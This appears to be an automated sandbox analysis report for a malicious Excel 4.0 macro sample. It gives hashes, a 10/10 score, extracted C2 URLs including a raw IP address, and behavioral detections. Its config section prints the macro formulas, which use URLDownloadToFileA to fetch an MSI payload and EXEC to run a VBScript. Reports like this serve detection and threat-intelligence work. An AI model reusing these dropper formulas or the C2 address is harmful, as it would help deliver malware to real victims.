General

  • Target

    27bf04a23d1e8e9211d8ac52d4e402fd

  • Size

    6KB

  • Sample

    231221-3lrypaddg2

  • MD5

    27bf04a23d1e8e9211d8ac52d4e402fd

  • SHA1

    e8bc0c80b2099eb4c51aeef9b5873bfb2974aa75

  • SHA256

    d360be15b2c924e258e65b96ad5b4cb755669c0f047dcd5d9e79ab7a156a4a47

  • SHA512

    244d6d42ed10ab1620565a7905ebf5c2c500434c4d112166d8492dfb12b97739b3d52a4b4b0e3e54183fc517ad5797fdcb2cdb89e71707093677021c11853296

  • SSDEEP

    192:NDSyuSgbrA2OmmfRz8UhHFBFYu1b98yhy+B:NFudM2wB1FYgb98yhp

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Targets

    • Target

      27bf04a23d1e8e9211d8ac52d4e402fd

    • Size

      6KB

    • MD5

      27bf04a23d1e8e9211d8ac52d4e402fd

    • SHA1

      e8bc0c80b2099eb4c51aeef9b5873bfb2974aa75

    • SHA256

      d360be15b2c924e258e65b96ad5b4cb755669c0f047dcd5d9e79ab7a156a4a47

    • SHA512

      244d6d42ed10ab1620565a7905ebf5c2c500434c4d112166d8492dfb12b97739b3d52a4b4b0e3e54183fc517ad5797fdcb2cdb89e71707093677021c11853296

    • SSDEEP

      192:NDSyuSgbrA2OmmfRz8UhHFBFYu1b98yhy+B:NFudM2wB1FYgb98yhp

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks